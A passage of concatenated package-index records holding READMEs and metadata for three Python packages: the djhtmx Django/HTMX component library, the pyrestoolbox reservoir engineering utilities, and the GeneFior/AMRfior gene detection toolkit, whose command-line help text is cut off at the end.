items = items.filter(name__icontains=self.query)
return items
```
Instantiate next to each other:
```html
<div>
...
{% htmx "SmartFilter" %}
{% htmx "SmartList" %}
...
</div>
```
When the filter mutates `query`, the URL is updated and the `SmartList` is awakened and re-rendered, because both point to the same query parameter.
## Signals
Sometimes you modify a model and want not just the current component to react, but also to trigger re-renders of other components that are not directly related to it. For this, signals are very convenient. Signals are strings representing topics; you can subscribe a component to them so it is re-rendered whenever any of its subscribed topics is triggered.
Signal formats:
- `app_label.modelname`: Some mutation happened to a model instance of this kind
- `app_label.modelname.instance_pk`: Some mutation happened to this precise instance of model
- `app_label.modelname.instance_pk.created`: This instance was created
- `app_label.modelname.instance_pk.updated`: This instance was updated
- `app_label.modelname.instance_pk.deleted`: This instance was deleted
When an instance is modified, both the more specific and the less specific signals are triggered.
Along with them, signals for related models are also triggered.
Example: if we have a Todo list app with the models:
```python
class TodoList(Model):
...
class Item(Model):
todo_list = ForeignKey(TodoList, related_name="items")
```
If from the list with id `932` you take an item with id `123` and update it, all these signals will be triggered:
- `todoapp.item`
- `todoapp.item.123`
- `todoapp.item.123.updated`
- `todoapp.todolist.932.items`
- `todoapp.todolist.932.items.updated`
### How to subscribe to signals
Let's say you want to count how many items there are in a certain Todo list, but your component is not re-rendered when the list changes because it sits outside of it. You can do this:
```python
from djhtmx.component import HtmxComponent
class ItemCounter(HtmxComponent):
todo_list: TodoList
def subscriptions(self):
return {
f"todoapp.todolist.{self.todo_list.id}.items.deleted",
f"todoapp.todolist.{self.todo_list.id}.items.created",
}
def count(self):
return self.todo_list.items.count()
```
This will make this component re-render every time an item is added or removed from the list `todo_list`.
## Dispatching Events between components
Sometimes it is handy to notify components in the same session that something changed so they can perform the corresponding update, and neither `Query()` nor Signals are convenient for this. In that case you can `Emit` events and listen to them.
Here is an implementation of `SmartFilter` and `SmartList` using this mechanism:
```python
from dataclasses import dataclass
from djhtmx.component import HtmxComponent, SkipRender, Emit
@dataclass(slots=True)
class QueryChanged:
query: str
class SmartFilter(HtmxComponent):
_template_name = "SmartFilter.html"
query: str = ""
def filter(self, query: str):
        self.query = query.strip()
yield Emit(QueryChanged(query))
yield SkipRender(self)
class SmartList(HtmxComponent):
_template_name = "SmartList.html"
query: str = ""
def _handle_event(self, event: QueryChanged):
self.query = event.query
@property
def items(self):
items = Item.objects.all()
if self.query:
items = items.filter(name__icontains=self.query)
return items
```
The library checks all components for a `_handle_event(event: ...)` method and, based on the annotation of `event`, subscribes them to those events. The annotation can be a single type or a `Union` of multiple event types.
## Inserting a component somewhere
Let's say we are making the TODO list app and we want that, when a new item is added, there is no full re-render of the whole list; instead, only the component handling the single new item is inserted into the list.
```python
from djhtmx.component import HtmxComponent, SkipRender, BuildAndRender
class TodoListComponent(HtmxComponent):
_template_name = "TodoListComponent.html"
todo_list: TodoList
def create(self, name: str):
item = self.todo_list.items.create(name=name)
yield BuildAndRender.prepend(
f"#{self.id} .list",
ItemComponent,
id=f"item-{item.id}",
item=item,
)
yield SkipRender(self)
class ItemComponent(HtmxComponent):
...
item: Item
...
```
`TodoListComponent.html`:
```html
{% load htmx %}
<div {% hx-tag %}>
<form {% on "submit" "create" %}>
<input type="text" name="name">
</form>
<ul class="list">
{% for item in items %}
{% htmx "ItemComponent" id="item-"|add:item.id item=item %}
{% endfor %}
</ul>
</div>
```
Use `BuildAndRender.<helper>(target, ...)` to send a component to be inserted somewhere or updated.
### Cascade Deletion
You can establish parent-child relationships so that when a parent component is destroyed, all its children are automatically destroyed recursively. This prevents memory leaks in complex component hierarchies.
#### Using BuildAndRender with parent_id
```python
class TodoListComponent(HtmxComponent):
def create(self, name: str):
item = self.todo_list.items.create(name=name)
# Child component that will be automatically destroyed when parent is destroyed
yield BuildAndRender.append(
"#todo-items",
ItemComponent,
parent_id=self.id, # Establishes parent-child relationship
id=f"item-{item.id}",
item=item
)
class Dashboard(HtmxComponent):
def show_modal(self):
# Modal becomes child of dashboard - destroyed when dashboard is destroyed
yield BuildAndRender.prepend("body", SettingsModal, parent_id=self.id)
```
#### Template Tag Automatic Tracking
When you use `{% htmx "ComponentName" %}` inside another component's template, parent-child relationships are automatically established:
```html
<!-- In TodoList.html template -->
{% load htmx %}
<div {% hx-tag %}>
{% for item in items %}
<!-- Each TodoItem automatically becomes a child of this TodoList -->
{% htmx "ItemComponent" id="item-"|add:item.id item=item %}
{% endfor %}
</div>
```
When the parent TodoList is destroyed, all child ItemComponent instances are automatically cleaned up.
#### Updating Components
Use `BuildAndRender.update()` to update existing components (preserves existing parent-child relationships):
```python
# Update existing component without changing relationships
yield BuildAndRender.update(SidebarWidget, data=sidebar_data)
```
## Focusing an item after render
Let's say we want to put the focus on an input inside the newly rendered `ItemComponent`; for this, use `yield Focus(target)`:
```python
from djhtmx.component import HtmxComponent, SkipRender, BuildAndRender, Focus
class TodoListComponent(HtmxComponent):
_template_name = "TodoListComponent.html"
todo_list: TodoList
def create(self, name: str):
item = self.todo_list.items.create(name=name)
item_id = f"item-{item.id}"
yield BuildAndRender.prepend(
f"{self.id} .list",
ItemComponent,
id=item_id,
item=item,
)
yield Focus(f"#{item_id} input")
yield SkipRender(self)
```
## Scrolling an item into view
Use `ScrollIntoView` to scroll an element into the viewport with configurable behavior:
```python
from djhtmx.component import HtmxComponent, ScrollIntoView
class NotificationComponent(HtmxComponent):
_template_name = "NotificationComponent.html"
def show_error(self, message: str):
self.error_message = message
# Scroll to the error message
yield ScrollIntoView("#error-message")
```
### Parameters
- `selector` (str): CSS selector of the element to scroll into view
- `behavior` (str): Scroll behavior - `"smooth"` (default), `"auto"`, or `"instant"`
- `block` (str): Vertical alignment - `"center"` (default), `"start"`, `"end"`, or `"nearest"`
- `if_not_visible` (bool): When `True`, only scrolls if the element is not fully visible in the viewport (default: `False`)
### Conditional scrolling example
Use `if_not_visible=True` to avoid unnecessary scrolling when the element is already in view:
```python
from djhtmx.component import HtmxComponent, ScrollIntoView
class SearchResults(HtmxComponent):
_template_name = "SearchResults.html"
query: str = ""
def search(self, query: str):
self.query = query
# Only scroll to results if they're not already visible
yield ScrollIntoView(
"#results",
behavior="smooth",
block="start",
if_not_visible=True
)
```
## Sending Events to the DOM
Suppose you have a rich JavaScript library (graphs, maps, or anything else) in the front-end and you want to communicate something to it because it is subscribed to some DOM event. For that you can use `yield DispatchDOMEvent(target, event, detail, ...)`:
```python
from djhtmx.component import HtmxComponent, DispatchDOMEvent
class TodoListComponent(HtmxComponent):
_template_name = "TodoListComponent.html"
todo_list: TodoList
def create(self, name: str):
item = self.todo_list.items.create(name=name)
yield DispatchDOMEvent(
"#leaflet-map",
"new-item",
{"id": item.id, "name": item.name, "geojson": item.geojson}
)
```
This will trigger that event in the front-end when the response arrives, allowing rich JavaScript components to react accordingly without a full re-render.
## Template Tags you should know about
- `{% htmx-headers %}`: put it inside your `<head></head>` to load the right scripts and configuration.
```html
<head>
{% htmx-headers %}
</head>
```
- `{% htmx <ComponentName: str> **kwargs %}`: instantiates and inserts the result of rendering that component with those initialization parameters.
```html
<div>
{% htmx 'Button' document=document name='Save Document' is_primary=True %}
</div>
```
- `{% hx-tag %}`: goes in the root HTML element of a component template; it sets the component `id` and some other basic configuration details of the component.
```html
<button {% hx-tag %}>
...
</button>
```
- `{% oob <LocalId: str> %}`: goes in the root HTML element of an element that will be used for partial render (swapped Out Of Band). It sets the id of the element to a concatenation of the current component id and whatever you pass to it, and sets the right [hx-swap-oob](https://htmx.org/attributes/hx-swap-oob/) strategy.
```html
<div {% oob "dropdown" %} class="dropdown">
...
</div>
```
- `{% on <EventName: str> <EventHandler: str> **kwargs %}`: binds the event, via [hx-trigger](https://htmx.org/attributes/hx-trigger/), to an event handler in the component with the given explicit parameters. Implicit parameters are taken from anything with a `name` attribute defined inside the component.
```html
<button {% on "click" "save" %}>
...
</button>
```
- `{% class <ClassName: str>: <BooleanExpr: bool>[, ...] %}`: used inside any HTML tag to set the class attribute, activating each class whose corresponding boolean expression is `True`.
```html
<button {% class "btn": True, "btn-primary": is_primary %}>
...
</button>
```
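The semantics of `{% class %}` can be sketched as a plain function (a hypothetical illustration, not djhtmx's internal implementation): keep each class name whose condition holds and join them with spaces.

```python
# Hypothetical helper mirroring the `{% class %}` tag's semantics.
def class_attr(pairs: list[tuple[str, bool]]) -> str:
    """Return the class attribute value: names whose condition is True."""
    return " ".join(name for name, cond in pairs if cond)

# Mirrors {% class "btn": True, "btn-primary": is_primary %}
class_attr([("btn", True), ("btn-primary", False)])  # -> "btn"
class_attr([("btn", True), ("btn-primary", True)])   # -> "btn btn-primary"
```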
## Testing
This library provides the class `djhtmx.testing.Htmx`, which implements a very basic runtime for testing components. How to use:
> Note: When working with lxml elements in tests, avoid truth-testing (e.g., `if elem:` or `if parent := elem.getparent()`). Use explicit `elem is not None` checks to prevent future warnings.
```python
from django.test import Client, TestCase
from djhtmx.testing import Htmx
from .models import Item
class TestNormalRendering(TestCase):
def setUp(self):
Item.objects.create(text="First task")
Item.objects.create(text="Second task")
self.htmx = Htmx(Client())
def test_todo_app(self):
self.htmx.navigate_to("/todo")
[a, b] = self.htmx.select('[hx-name="TodoItem"] label')
self.assertEqual(a.text_content(), "First task")
self.assertEqual(b.text_content(), "Second task")
[count] = self.htmx.select(".todo-count")
self.assertEqual(count.text_content(), "2 items left")
# Add new item
self.htmx.type("input.new-todo", "3rd task")
self.htmx.trigger("input.new-todo")
[count] = self.htmx.select(".todo-count")
self.assertEqual(count.text_content(), "3 items left")
[a, b, c] = self.htmx.select('[hx-name="TodoItem"] label')
self.assertEqual(a.text_content(), "First task")
self.assertEqual(b.text_content(), "Second task")
self.assertEqual(c.text_content(), "3rd task")
```
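The lxml caveat in the note above can be demonstrated with the stdlib `xml.etree.ElementTree`, which shares the same truthiness behavior: an element's truth value reflects whether it has child elements, not whether the lookup succeeded.

```python
import xml.etree.ElementTree as ET

# A <span> with text but no child elements.
doc = ET.fromstring("<div><span>found me</span></div>")
span = doc.find("span")

# Wrong: `if span:` is False for a childless element even though it exists
# (and truth-testing elements is deprecated). Compare identity explicitly:
assert span is not None
assert len(span) == 0  # no child elements, which is why truth-testing misleads
```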
### API
`Htmx(client: Client)`: pass a Django test client; it can be authenticated if that's required.
`htmx.navigate_to(url, *args, **kwargs)`: navigates to some URL. It is a wrapper of `Client.get` that retrieves the page, parses the HTML into `htmx.dom: lxml.html.HtmlElement`, and creates a component repository in `htmx.repo`.
`htmx.url -> str`: Returns the current URL composed of the path and query string (without a trailing `?`).
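The composition rule for `htmx.url` can be illustrated with a small hypothetical helper (not part of the testing API):

```python
# Hypothetical sketch of how path and query string compose into htmx.url.
def compose_url(path: str, query_string: str) -> str:
    """Join path and query string, omitting the '?' when the query is empty."""
    return f"{path}?{query_string}" if query_string else path

compose_url("/todo", "filter=active")  # -> "/todo?filter=active"
compose_url("/todo", "")               # -> "/todo" (no trailing "?")
```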
#### State
`htmx.client: Client`: The underlying Django test client.
`htmx.dom: lxml.html.HtmlElement`: Parsed DOM of the current page.
`htmx.repo: djhtmx.repo.Repository`: Component repository for the current page.
`htmx.path: str`: Current path (no query string).
`htmx.query_string: str`: Current query string without the leading `?`.
#### Look-ups
`htmx.select(css_selector: str) -> list[lxml.html.HtmlElement]`: Pass some CSS selector here to retrieve nodes from the DOM, so you can modify them or perform assertions over them.
`htmx.find_by_text(text: str) -> list[lxml.html.HtmlElement]`: Returns the elements whose text matches exactly.
`htmx.get_component_by_type(component_type: type[THtmxComponent]) -> THtmxComponent`: Retrieves the only instance rendered of that component type in the current page. If there is more than one instance this fails.
`htmx.get_components_by_type(component_type: type[THtmxComponent]) -> list[THtmxComponent]`: Retrieves all instances of this component type in the current page.
`htmx.get_component_by_id(component_id: str) -> THtmxComponent`: Retrieves a component by its id from the current page.
`htmx.print(element: lxml.html.HtmlElement)`: Pretty-prints the element HTML with syntax highlighting for debugging.
#### Interactions
`htmx.type(selector: str | html.HtmlElement, text: str, clear=False)`: simulates typing in an input or text area. If `clear=True`, it replaces the current text in it.
`htmx.trigger(selector: str | html.HtmlElement)`: triggers whatever event is bound in the selected element and returns after all side effects have been processed.
```python
self.htmx.type("input.new-todo", "3rd task")
self.htmx.trigger("input.new-todo")
```
`htmx.send(method: Callable[P, Any], *args: P.args, **kwargs: P.kwargs)`: asks the runtime to execute a bound method of an HtmxComponent and returns after all side effects have been processed. Use as in:
```python
todo_list = htmx.get_component_by_type(TodoList)
htmx.send(todo_list.new_item, text="New todo item")
```
`htmx.dispatch_event(component_id: str, event_handler: str, kwargs: dict[str, Any])`: similar to `htmx.send`, but you don't need the instance; you just need to know its id.
```python
htmx.dispatch_event("#todo-list", "new_item", {"text": "New todo item"})
```
| text/markdown | null | Eddy Ernesto del Valle Pino <eddy@edelvalle.me> | null | null | null | django, htmx, liveview, reactive, real-time, spa, websockets | [
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Framework :: Django",
"Framework :: Django :: 4.1",
"Framework :: Django :: 4.2",
"Framework :: Django :: 5.0",
"Framework :: Django :: 5.1",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.13",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.13 | [] | [] | [] | [
"channels>=4.1.0",
"django>=4.1",
"mmh3>=5.1.0",
"orjson>=3.10.7",
"pydantic<3,>=2",
"redis[hiredis]>=5.0.8",
"uuid6>=2024.7.10",
"xotl-tools>=3.1.1",
"logfire[django]>=3.8.0; extra == \"logfire\"",
"sentry-sdk>=2.19; extra == \"sentry\""
] | [] | [] | [] | [
"Homepage, https://github.com/edelvalle/djhtmx",
"Documentation, https://github.com/edelvalle/djhtmx#readme",
"Repository, https://github.com/edelvalle/djhtmx.git",
"Issues, https://github.com/edelvalle/djhtmx/issues",
"Changelog, https://github.com/edelvalle/djhtmx/blob/master/CHANGELOG.md"
] | uv/0.10.0 {"installer":{"name":"uv","version":"0.10.0","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Manjaro Linux","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T09:21:49.439538 | djhtmx-1.3.8-py3-none-any.whl | 226,546 | 56/cd/546b22c2c0f786ae0cfbe6b42550ddb3377545f10ee9fc829f044e636ebf/djhtmx-1.3.8-py3-none-any.whl | py3 | bdist_wheel | null | false | 5c4462e29db74d2526e22727717e1a86 | 6cf8471de8f77af02f2dade1983d4adc4830a3d04b73d4bd6db8c7b16c886af4 | 56cd546b22c2c0f786ae0cfbe6b42550ddb3377545f10ee9fc829f044e636ebf | MIT | [
"LICENSE"
] | 228 |
2.4 | pyrestoolbox | 2.2.3 | pyResToolbox - A collection of Reservoir Engineering Utilities | `pyrestoolbox`
==============
A collection of Reservoir Engineering Utilities
-----------------------------------------------
This set of functions focuses on those that the author uses often while
crafting programming solutions. These are the scripts that are often
copy/pasted from previous work - sometimes slightly modified - resulting
in a trail of slightly different versions over the years. Some attempt
has been made here to make this implementation flexible enough such that
it can be relied on as-is going forward.
Note: Version 2.x refactors functions into different modules, requiring separate imports
Includes functions to perform simple calculations, including:
- Inflow for oil and gas
- PVT Calculations for oil
- PVT calculation for gas
- Return critical parameters for typical components
- Creation of Black Oil Table information
- Creation of layered permeability distribution consistent with a
Lorenz heterogeneity factor
- Extract problem cell information from Intersect (IX) print files
- Generation of AQUTAB include file influence functions for use in
ECLIPSE
- Creation of Corey and LET relative permeability tables in Eclipse
format
- Calculation of Methane and CO2 saturated brine properties
Apologies in advance that it is only in oilfield units, with no current plans to add universal multi-unit support.
Changelist in 2.1.4:
- Fix oil Rs calculation, which was incorrectly always using the VALMC method regardless of the rsmethod specified in oil_rs_bub
- Updated Gas Z-factor and viscosity with BUR method.
Changelist in 2.1.3:
- Updated viscosity parameters for BUR method.
Changelist in 2.1.2:
- Fixed bug in implementation of Velarde, Blasingame & McCain Oil Rs calculation.
Changelist in 2.1.0:
- Fixed variable Typing issue that caused problems with Python 3.9 and older.
- Added reference to the Burgoyne ('BUR') methods for gas Z-Factor and critical property correlation
Changelist in 2.0.0:
- Modified the new Z-Factor method, 'BUR', now a tuned five component Peng Robinson method that is fast and stable and able to handle up to 100% of CO2, H2S, N2 or H2 as well as natural gas. Viscosities are calculated with a tuned LBC model.
- Refactored all code to split into modules for ease of future maintenance
Changelist in 1.4.4:
- Added in new Z-Factor method, 'BUR', which is a tuned single component Peng Robinson method that is fast and stable
Changelist in 1.4.2:
- Corrected CO2 solubility calculations when two roots in CO2 liquid phase
Changelist in 1.4.1:
- Added calculation of Ezrokhi coefficients for brine density and viscosity with dissolved CO2
Changelist in 1.4.0:
- Introduced CO2 saturated brine calculations using Spycher & Pruess modified SRK EOS method
- Rectified an error introduced in Gas Z-Factor calculations due to errant indentation
Changelist in 1.3.9:
- Tweaks to speed DAK and Hall & Yarborough Z-Factor calculations
Changelist in 1.3.8:
- Fix bug in Hall & Yarborough Z-Factor calculation
Changelist in 1.3.5:
- Fix bug in ECL deck zip/check recursion
Changelist in 1.3.4:
- Extend ECL deck zip/check function to handle IX formatted decks, and support zipping multiple decks at once.
Changelist in 1.3.2:
- Added robust Rachford Rice solver in Simulation Helpers
- Moved relative permeability functions and simulation helpers to separate .simtools module
Changelist in 1.2.0
- Added Component Critical Property Library
Changelist in v1.1.4:
- Attempting to fix reported issue with required dependencies not installing correctly
Changelist in v1.1:
- Fix API to SG calculation (141.4 vs 141.5)
- Added lower limit to first rho_po estimate for Oil Density with McCain method to avoid negative values with high Rs
- Added oil_sg and oil_api functions
- Modified HY Z-Factor solve algorithm to improve robustness
- Modified DAK Z-Factor solve algorithm to improve robustness
- Added Gas Z-Factor correlation from Wang, Ye & Wu (2021)
- Removed 'LIN' Z-Factor method due to significant errors above 12,000 psi. Use WYW method instead if speed needed.
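The API ↔ SG fix in v1.1 concerns the standard API gravity relation (141.5, not 141.4). A minimal sketch of the conversion, illustrative only and not the library's exact `oil_api`/`oil_sg` signatures:

```python
def oil_api_to_sg(api: float) -> float:
    # Standard relation: SG = 141.5 / (API + 131.5); v1.1 corrected 141.4 -> 141.5
    return 141.5 / (api + 131.5)

def oil_sg_to_api(sg: float) -> float:
    # Inverse relation: API = 141.5 / SG - 131.5
    return 141.5 / sg - 131.5

oil_api_to_sg(35.0)  # ~0.850 for a 35 deg API oil
```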
Head to the project site for more information & documentation:
https://github.com/mwburgoyne/pyResToolbox
Start by importing the package:
from pyrestoolbox import pyrestoolbox as rtb
Function List includes
-------------
- Gas Flow Rate Radial
- Gas Flow Rate Linear
- Oil Flow Rate Radial
- Oil Flow Rate Linear
----------------------------
- Gas Tc & Pc Calculation
- Gas Z-Factor Calculation
- Gas Viscosity
- Gas Viscosity \* Z
- Gas Compressibility
- Gas Formation Volume Factor
- Gas Density
- Gas Water of Condensation
- Convert P/Z to P
- Convert Gas Gradient to SG
- Delta Pseudopressure
- Gas Condensate FWS SG
----------------------------
- Component Critical Properties Library
----------------------------
- Oil Density from MW
- Oil Critical Properties with Twu
- Incremental GOR post Separation
- Oil Bubble Point Pressure
- Oil GOR at Pb
- Oil GOR at P
- Oil Compressibility
- Oil Density
- Oil Formation Volume Factor
- Oil Viscosity
- Generate Black Oil Table data
- Estimate soln gas SG from oil
- Estimate SG of gas post separator
- Calculate weighted average surface gas SG
- Oil API to SG
- Oil SG to API
----------------------------
- Calculate suite of methane saturated brine properties
- Calculate suite of CO2 saturated brine properties
----------------------------
- Lorenz coefficient from Beta value
- Lorenz coefficient from flow fraction
- Lorenz coefficient to flow fraction
- Lorenz coefficient to permeability array
----------------------------
- Summarize IX convergence errors from PRT file
- Create Aquifer Influence Functions
- Solve Rachford Rice for user specified feed Zis and Ki's
- Create sets of rel perm tables
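For illustration of the flash problem the Rachford-Rice solver addresses, here is a simple bisection sketch (not the library's robust implementation) for user-specified feed Zi's and Ki's:

```python
def rachford_rice_v(z: list[float], K: list[float], iters: int = 100) -> float:
    """Vapor fraction V solving sum(z_i*(K_i - 1)/(1 + V*(K_i - 1))) = 0.

    Simple bisection; assumes the feed flashes two-phase (a root in (0, 1)).
    """
    def f(V: float) -> float:
        return sum(zi * (Ki - 1.0) / (1.0 + V * (Ki - 1.0)) for zi, Ki in zip(z, K))

    lo, hi = 0.0, 1.0
    for _ in range(iters):
        mid = 0.5 * (lo + hi)
        # f is monotonically decreasing in V, so keep the half containing the root
        if f(lo) * f(mid) <= 0.0:
            hi = mid
        else:
            lo = mid
    return 0.5 * (lo + hi)

rachford_rice_v([0.5, 0.5], [2.0, 0.5])  # 0.5 for this symmetric feed
```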
| text/markdown | Mark W. Burgoyne | mark.w.burgoyne@gmail.com | null | null | GNU General Public License v3 or later (GPLv3+) | restoolbox, petroleum, reservoir | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)",
"Operating System :: OS Independent"
] | [] | https://github.com/mwburgoyne/pyResToolbox | null | null | [] | [] | [] | [
"numpy",
"scipy",
"pandas",
"tabulate",
"gwr_inversion",
"mpmath",
"openpyxl"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.9.13 | 2026-02-20T09:21:45.200703 | pyrestoolbox-2.2.3.tar.gz | 1,159,784 | ba/85/417dcfe6064ccee15dc448eb49ab11226679eda151f52ef00a640b8ca66a/pyrestoolbox-2.2.3.tar.gz | source | sdist | null | false | 99c0f06a6b3e0bb36a34c62a2d924d2a | 805e353320d8077a76c240d33157814eb22f7410869596a1be915d45e7fb0576 | ba85417dcfe6064ccee15dc448eb49ab11226679eda151f52ef00a640b8ca66a | null | [
"LICENSE"
] | 258 |
2.4 | GeneFior | 0.6.0 | GeneFior: A toolkit that uses BLAST, BWA, Bowtie2, DIAMOND, MMseqs2 and Minimap2 to search DNA and protein sequences against DNA and AA sequence databases. | # GeneFíor (pronounced Gene "feer", sounds like beer)
This toolkit utilises a combined approach that uses BLAST, BWA, Bowtie2, DIAMOND, MMseqs2 and Minimap2 to search DNA and protein sequences against DNA and AA sequence databases - Databases including CARD/RGI and ResFinder are preloaded.
## Requirements:
- python >=3.10
- samtools >=1.19.2
- blast >=2.17.0
- diamond >=2.1.13
- bowtie2 >=2.5.4
- bwa >=0.7.19
- minimap2 >=2.30
- seqtk >=1.4
- mmseqs2 (mmseqs) >= 18.8cc5c
### Installation:
GeneFíor is available via bioconda. To install, use the following command:
```commandline
conda create -n genefior -c conda-forge -c bioconda genefior
```
GeneFíor is also available via pip, but bioconda is recommended to ensure all dependencies are correctly installed.
```commandline
pip install genefior
```
## Menu for GeneFíor (GeneFíor or genefíor):
BLASTn and BLASTx are disabled by default due to their slow speed, but can be enabled if desired.
```commandline
GeneFíor - The Multi-Tool Gene Detection Toolkit.
Required selection:
-i INPUT, --input INPUT
Input FASTA/FASTAQ file(s) with sequences to analyse - Separate FASTQ R1 and R2 with a comma for Paired-FASTQ or single file path for Single-FASTA - .gz files
accepted
-st {Single-FASTA,Paired-FASTQ}, --sequence-type {Single-FASTA,Paired-FASTQ}
Specify the input Sequence Type: Single-FASTA or Paired-FASTQ (R1+R2) - Will convert Paired-FASTQ to single combined FASTA for BLAST and DIAMOND analyses (SLOW)
-o OUTPUT, --output OUTPUT
Output directory for results
Output selection:
--report-fasta {None,all,detected,detected-all}
Specify whether to output sequences that "mapped" to genes."all" should only be used for deep investigation/debugging."detected" will report the reads that passed
detection thresholds for each detected gene."detected-all" will report all reads for each detected gene. (default: None)
Tool selection:
--tools {blastn,blastx,diamond,bowtie2,bwa,minimap2,mmseqs2,all} [{blastn,blastx,diamond,bowtie2,bwa,minimap2,mmseqs2,all} ...]
Specify which tools to run - "all" will run all tools (default: all except blastx/n and mmseqs2 (sensitivity 7.5 and results do not
seem to be deterministic) as these are very slow!!)
Database selection:
--db-path USER_DB_PATH
Path to the directory containing user-provided databases in correct format (see build_databases.sh) (can supply multiple paths separated by commas)
Query threshold Parameters:
--q-min-cov QUERY_MIN_COVERAGE, --query-min-coverage QUERY_MIN_COVERAGE
Minimum coverage threshold in percent (default: 40.0)
Gene Detection Parameters:
--d-min-cov DETECTION_MIN_COVERAGE, --detection-min-coverage DETECTION_MIN_COVERAGE
Minimum coverage threshold in percent (default: 80.0)
--d-min-id DETECTION_MIN_IDENTITY, --detection-min-identity DETECTION_MIN_IDENTITY
Minimum identity threshold in percent (default: 80.0)
--d-min-base-depth DETECTION_MIN_BASE_DEPTH, --detection-min-base-depth DETECTION_MIN_BASE_DEPTH
Minimum average base depth for detection - calculated against regions of the detected gene with at least one read hit (default: 1.0)
--d-min-reads DETECTION_MIN_NUM_READS, --detection-min-num-reads DETECTION_MIN_NUM_READS
Minimum number of reads required for detection (default: 1)
Mode Selection:
--dna-only Run only DNA-based tools
--protein-only Run only protein-based tools
--sensitivity {default,conservative,sensitive,very-sensitive}
Preset sensitivity levels - default means each tool uses its own default settings and very-sensitive applies DIAMONDs --ultra-sensitive and Bowtie2s --very-
sensitive-local presets
Tool-Specific Parameters:
--minimap2-preset {sr,map-ont,map-pb,map-hifi}
Minimap2 preset: sr=short reads, map-ont=Oxford Nanopore, map-pb=PacBio, map-hifi=PacBio HiFi (default: sr)
Runtime Parameters:
-t THREADS, --threads THREADS
Number of threads to use (default: 4)
-tmp TEMP_DIRECTORY, --temp-directory TEMP_DIRECTORY
Path to temporary to place input FASTA/Q file(s) for faster IO during BLAST - Path will also be used for all temporary files (default: system temp directory)
--no_cleanup
--verbose
Miscellaneous Parameters:
-v, --version Show program version and exit
Examples:
# Basic usage with default tools (runs DNA & protein tools)
genefior -i reads.fasta -st Single-FASTA --db-path ~/my-db-dir -o results/
# Select specific tools and output detected FASTA sequences
genefior -i reads.fasta -st Single-FASTA --db-path ~/my-db-dir -o results/ --tools diamond bowtie2 --report_fasta detected
# Custom thresholds, paired-fastq input, threads and dna-only mode
genefior -i reads_R1.fastq,reads_R2.fastq -st Paired-FASTQ --db-path ~/my-db-dir -o results/ -t 16 --d-min-cov 90 --d-min-id 85 --dna-only
```
# AMRfíor has been absorbed into GeneFíor but is still available as a separate command for backwards compatibility, with the same functionality and AMR databases.
## Menu for AMRfíor:
CARD and resfinder databases are used by default, but user-provided databases can also be specified.
The NCBI AMR database is also available as an option.
All 3 databases are prepackaged and formatted as part of the bioconda installation of AMRfíor.
## Menu for AMRfíor (AMRfíor or amrfíor):
BLASTn and BLASTx are disabled by default due to their slow speed, but can be enabled if desired.
```commandline
AMRfíor - The Multi-Tool AMR Gene Detection Toolkit.
Required selection:
-i INPUT, --input INPUT
Input FASTA/FASTAQ file(s) with sequences to analyse - Separate FASTQ R1 and R2 with a comma for Paired-FASTQ or single file path for Single-FASTA - .gz files
accepted
-st {Single-FASTA,Paired-FASTQ}, --sequence-type {Single-FASTA,Paired-FASTQ}
Specify the input Sequence Type: Single-FASTA or Paired-FASTQ (R1+R2) - Will convert Paired-FASTQ to single combined FASTA for BLAST and DIAMOND analyses (SLOW)
-o OUTPUT, --output OUTPUT
Output directory for results
Output selection:
--report-fasta {None,all,detected,detected-all}
Specify whether to output sequences that "mapped" to genes."all" should only be used for deep investigation/debugging."detected" will report the reads that passed
detection thresholds for each detected gene."detected-all" will report all reads for each detected gene. (default: None)
Tool selection:
--tools {blastn,blastx,diamond,bowtie2,bwa,minimap2,mmseqs2,all} [{blastn,blastx,diamond,bowtie2,bwa,minimap2,mmseqs2,all} ...]
Specify which tools to run - "all" will run all tools (default: all except blastx/n and mmseqs2 (sensitivity 7.5 and results do not
seem to be deterministic) as these are very slow!!)
Database selection:
--databases {resfinder,card,ncbi,user-provided} [{resfinder,card,ncbi,user-provided} ...]
Specify which AMR gene databases to use (default: resfinder and card) -If "user-provided" is selected, please ensure the path contains the appropriate databases
set up as per the documentation and specify the path with --user-db-path.
--user-db-path USER_DB_PATH
Path to the directory containing user-provided databases (required if --databases includes "user-provided")
Query threshold Parameters:
--q-min-cov QUERY_MIN_COVERAGE, --query-min-coverage QUERY_MIN_COVERAGE
Minimum coverage threshold in percent (default: 40.0)
Gene Detection Parameters:
--d-min-cov DETECTION_MIN_COVERAGE, --detection-min-coverage DETECTION_MIN_COVERAGE
Minimum coverage threshold in percent (default: 80.0)
--d-min-id DETECTION_MIN_IDENTITY, --detection-min-identity DETECTION_MIN_IDENTITY
Minimum identity threshold in percent (default: 80.0)
--d-min-base-depth DETECTION_MIN_BASE_DEPTH, --detection-min-base-depth DETECTION_MIN_BASE_DEPTH
Minimum average base depth for detection - calculated against regions of the detected gene with at least one read hit (default: 1.0)
--d-min-reads DETECTION_MIN_NUM_READS, --detection-min-num-reads DETECTION_MIN_NUM_READS
Minimum number of reads required for detection (default: 1)
Mode Selection:
--dna-only Run only DNA-based tools
--protein-only Run only protein-based tools
--sensitivity {default,conservative,sensitive,very-sensitive}
Preset sensitivity levels - default means each tool uses its own default settings and very-sensitive applies DIAMONDs --ultra-sensitive and Bowtie2s --very-
sensitive-local presets
Tool-Specific Parameters:
--minimap2-preset {sr,map-ont,map-pb,map-hifi}
Minimap2 preset: sr=short reads, map-ont=Oxford Nanopore, map-pb=PacBio, map-hifi=PacBio HiFi (default: sr)
Runtime Parameters:
-t THREADS, --threads THREADS
Number of threads to use (default: 4)
-tmp TEMP_DIRECTORY, --temp-directory TEMP_DIRECTORY
Path to temporary to place input FASTA/Q file(s) for faster IO during BLAST - Path will also be used for all temporary files (default: system temp directory)
--no_cleanup
--verbose
Miscellaneous Parameters:
-v, --version Show program version and exit
Examples:
